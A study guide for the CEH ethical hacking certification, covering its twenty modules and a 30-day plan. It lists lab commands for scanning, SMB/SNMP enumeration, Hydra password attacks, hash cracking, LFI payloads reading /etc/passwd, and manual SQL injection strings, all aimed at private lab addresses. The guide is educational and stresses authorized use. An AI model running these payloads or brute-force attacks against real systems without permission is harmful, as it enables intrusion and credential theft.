The CEH exam is not hard because the tools are mysterious. It is hard because candidates try to memorize tool names without understanding the workflow. They know that Nmap scans ports, Hydra tests passwords, Wireshark reads packets, and Burp intercepts web traffic, but they do not know when to use each tool, what output matters, or how one finding becomes the next step.
This guide is built for that gap. If you are preparing for CEH in 2026, you need two tracks at the same time: the knowledge exam mindset and the hands-on practical mindset. The knowledge exam checks breadth across ethical hacking concepts, tools, attack phases, cloud, IoT, mobile, web, crypto, and reporting. CEH Practical checks whether you can enumerate, exploit lab targets, capture evidence, and answer scenario-based tasks under time pressure.
Use everything here only in authorized labs, your own systems, or environments where you have explicit permission. CEH is an ethical hacking certification; permission is not optional.
What CEH Tests In 2026
EC-Council currently presents CEH as a twenty-module program with a knowledge exam and a practical exam path. The knowledge exam is multiple choice. CEH Practical is a six-hour hands-on exam with practical challenges in a browser-based cyber range. Exact operational details can change, so always re-check EC-Council’s official CEH pages before scheduling.
CEH preparation map: Knowledge exam: - Concepts, terminology, tools, attack phases, countermeasures - Broad coverage across the CEH module set - You must recognize what a tool or technique is used for CEH Practical: - Hands-on enumeration and exploitation in a lab - Tool output interpretation - Capturing flags / answers from target systems - Web, network, system, and privilege-related tasks Winning strategy: - Learn the concept - Run the tool in a lab - Save the command and output - Explain the defensive control
The CEH Module Map
Do not study the modules as isolated chapters. Study them as an attack lifecycle. Footprinting finds the target surface. Scanning confirms services. Enumeration extracts identity and configuration. Vulnerability analysis chooses a path. System hacking, web attacks, wireless, cloud, mobile, and IoT become execution domains. Sniffing, evasion, crypto, and malware explain how attacks and defenses behave.
CEH module set to master: 01. Introduction to Ethical Hacking 02. Footprinting and Reconnaissance 03. Scanning Networks 04. Enumeration 05. Vulnerability Analysis 06. System Hacking 07. Malware Threats 08. Sniffing 09. Social Engineering 10. Denial-of-Service 11. Session Hijacking 12. Evading IDS, Firewalls, and Honeypots 13. Hacking Web Servers 14. Hacking Web Applications 15. SQL Injection 16. Hacking Wireless Networks 17. Hacking Mobile Platforms 18. IoT and OT Hacking 19. Cloud Computing 20. Cryptography
For the knowledge exam, know definitions, tool categories, attack indicators, and countermeasures. For practical, know the commands well enough to run them quickly and interpret the result without reading a manual.
Module 2-4: Reconnaissance, Scanning, Enumeration
Your first practical skill is service discovery. Every lab target begins with the same questions: what hosts are alive, what ports are open, what services are exposed, what versions are running, and what can be accessed anonymously?
# Discover live hosts on a lab subnet sudo netdiscover -r 192.168.56.0/24 nmap -sn 192.168.56.0/24 # Full TCP scan nmap -p- --min-rate 1000 -T4 -oN allports.txt 192.168.56.10 # Targeted version and script scan nmap -p 22,80,139,445 -sC -sV -O -oA targeted 192.168.56.10 # UDP starter scan sudo nmap -sU --top-ports 20 --max-retries 2 -oN udp.txt 192.168.56.10 # Quick banner grabs nc -nv 192.168.56.10 21 nc -nv 192.168.56.10 25 curl -I http://192.168.56.10/
For SMB, FTP, SNMP, DNS, and web services, anonymous access can be the whole vulnerability. CEH practical tasks often reward basic enumeration done carefully.
# SMB smbclient -L //192.168.56.10 -N smbmap -H 192.168.56.10 enum4linux-ng -A 192.168.56.10 # FTP ftp 192.168.56.10 nmap -p21 --script ftp-anon,ftp-syst 192.168.56.10 # SNMP onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.56.10 snmpwalk -v2c -c public 192.168.56.10 # DNS dig @192.168.56.10 example.local axfr dnsrecon -d example.local -n 192.168.56.10
Module 5-6: Vulnerability Analysis And System Hacking
For the theory exam, understand the difference between vulnerability scanning, exploitation, post-exploitation, persistence, privilege escalation, and covering tracks. For practical, focus on manual confirmation. Do not just say “Apache is old.” Identify the version, search for known issues, test safely, and capture proof.
# Search local exploit database searchsploit apache 2.4.49 searchsploit -m linux/webapps/50383.sh # Check kernel and OS after shell uname -a cat /etc/os-release id sudo -l # Linux privesc basics find / -perm -u=s -type f 2>/dev/null getcap -r / 2>/dev/null cat /etc/crontab ps auxww ss -tulpn # Windows privesc basics whoami /all systeminfo net user net localgroup administrators cmdkey /list reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Know password attacks conceptually and practically. In real engagements, password spraying can lock accounts and harm users; in labs, it teaches authentication testing. Understand lockout policy before touching production.
# Lab-only examples hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.10 -t 4 hydra -L users.txt -p 'Password123!' smb://192.168.56.10 # Hash identification and cracking hashid hash.txt hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Modules 13-15: Web Servers, Web Apps, SQL Injection
Web application testing is central to CEH Practical because it combines browsing, interception, enumeration, input validation, and authentication logic. Learn Burp Community well enough to proxy, repeat requests, change parameters, and observe responses.
# Web content discovery ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \ -u http://192.168.56.10/FUZZ -ic -c ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \ -u http://192.168.56.10/FUZZ -e .php,.txt,.bak,.zip -ic -c # WordPress enumeration in an authorized lab wpscan --url http://192.168.56.10/ --enumerate u,p,t # LFI checks curl 'http://192.168.56.10/index.php?page=../../../../etc/passwd' curl 'http://192.168.56.10/index.php?page=php://filter/convert.base64-encode/resource=index.php'
For SQL injection, know the manual patterns. The exam may ask theory questions about union-based, error-based, blind, time-based, and boolean-based injection. Practical tasks may only require identifying the vulnerable parameter and extracting a value.
-- Manual SQLi probes ' OR '1'='1'-- ' OR 1=1-- - ' ORDER BY 1-- - ' UNION SELECT null,null,null-- - -- Time delays ' OR SLEEP(5)-- - '; WAITFOR DELAY '00:00:05'-- -- Common MySQL enumeration ' UNION SELECT database(),user(),version()-- - ' UNION SELECT table_name,null,null FROM information_schema.tables-- - ' UNION SELECT column_name,null,null FROM information_schema.columns WHERE table_name='users'-- -
Modules 7-12: Malware, Sniffing, Social Engineering, DoS, Sessions, Evasion
You do not need to become a malware author for CEH, but you must understand malware types, delivery, persistence, indicators, and defensive controls. For sniffing, learn Wireshark filters and what protocols reveal in cleartext. For social engineering, memorize attack types and controls: phishing, vishing, smishing, pretexting, baiting, tailgating, awareness, MFA, and verification procedures.
# Wireshark / tcpdump skills sudo tcpdump -i eth0 -nn host 192.168.56.10 sudo tcpdump -i eth0 -nn port 80 -w capture.pcap # Display filters to know in Wireshark http dns tcp.port == 80 ip.addr == 192.168.56.10 ftp.request.command == "USER" http.request.method == "POST"
For evasion and IDS topics, understand concepts: signature-based detection, anomaly-based detection, fragmentation, encoding, encryption, tunneling, decoys, honeypots, and why defense-in-depth matters. CEH theory loves matching technique to countermeasure.
Modules 16-20: Wireless, Mobile, IoT, Cloud, Cryptography
For wireless, know WPA/WPA2 concepts, handshakes, evil twins, deauthentication, WPS weaknesses, and secure configuration. For mobile and IoT, focus on attack surface: insecure storage, weak APIs, outdated firmware, default credentials, exposed debug interfaces, and network services. For cloud, understand shared responsibility, IAM, public buckets, metadata services, logging, and least privilege.
# Cryptography and encoding basics echo 'PlainlySec' | base64 echo 'UGxhaW5seVNlYwo=' | base64 -d echo -n 'PlainlySec' | md5sum echo -n 'PlainlySec' | sha256sum # TLS certificate inspection openssl s_client -connect example.com:443 -servername example.com # Cloud mindset checks - Are storage buckets public? - Are IAM roles overprivileged? - Are access keys long-lived? - Is logging enabled? - Is MFA enforced for administrators? - Can workloads reach metadata credentials?
CEH Practical Lab Workflow
In practical labs, do not chase perfect exploitation. Build repeatable workflows. For each target, run recon, enumerate services, test obvious access, search for web paths, try credentials, collect evidence, and move on if a path stalls.
Practical target workflow: 1. nmap full TCP scan 2. targeted nmap version scan 3. web discovery if HTTP exists 4. anonymous SMB/FTP/SNMP checks 5. default credential checks in lab scope 6. vulnerability research by version 7. manual exploit confirmation 8. shell stabilization 9. local enumeration 10. privilege escalation 11. capture proof / answer 12. write notes immediately
The 30-Day CEH Study Plan
Week 1: Foundations and recon - CEH modules 1-5 - Nmap, SMB, FTP, DNS, SNMP - 10 lab targets focused only on enumeration Week 2: Web and system hacking - CEH modules 6, 13, 14, 15 - Burp Community, ffuf, manual SQLi, LFI, uploads - Linux and Windows local enumeration Week 3: Network, wireless, cloud, crypto - CEH modules 7-12 and 16-20 - Wireshark, tcpdump, crypto basics, cloud IAM concepts - Daily theory review Week 4: Practical simulation - Timed six-hour lab blocks - No notes except your cheat sheet - Build final command sheet - Review missed theory questions
The final rule: do not memorize commands as decoration. For every command, know what it answers. If you cannot explain why you are running it, you are not studying; you are collecting noise.
Official References Checked
This guide was aligned against EC-Council CEH public certification and CEH Practical materials available in May 2026. Always verify the official blueprint, pricing, eligibility, and exam delivery details before booking.